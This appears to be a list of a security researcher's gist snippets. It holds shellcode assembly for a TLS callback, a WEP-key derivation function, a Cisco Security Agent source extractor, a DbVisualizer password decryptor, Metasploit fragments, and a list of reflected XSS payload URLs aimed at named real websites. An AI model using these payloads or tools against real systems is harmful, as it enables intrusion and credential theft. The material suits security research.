gerry

offset = 0x1000 - len(scode) - 32
tls_header  = "\xE8\x00\x00\x00\x00"                 # CALL $+5
tls_header += "\x5E"                                 # POP ESI
tls_header += "\x83\xC6\x1B"                         # ADD ESI, 0x1b 
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00"         # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57"                                 # PUSH EDI
tls_header += "\xFC"                                 # CLD
tls_header += "\xF3\xA4"                             # REP MOVSB [EDI], [ESI]

gerry

# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)

def get_key(essid):
    key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
    return hex(key)

# >>> print get_key("E3X12")
# 0x349fca

gerry

#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile

gerry

https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//

gerry

#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

gerry

# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
#
# Create gem with:
#   $ gem build msf-rex.gemspec
#
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.


$: << 'lib'

gerry

diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
        # There is no place the NBE actually stores the plugin name used to
        # scan. You get "Security Note" or "Security Warning," and that's it.
        def import_nessus_nbe(args={}, &block)
-               data = args[:data]
+               nbe_data = args[:data]

gerry

#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+]     security/p/gerry/misc/decrypt_dbvis.py <config filename>

gerry

Keybase proof

I hereby claim:

• I am gerry on github.
• I am gerry (https://keybase.io/gerry) on keybase.
• I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

gerry

#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op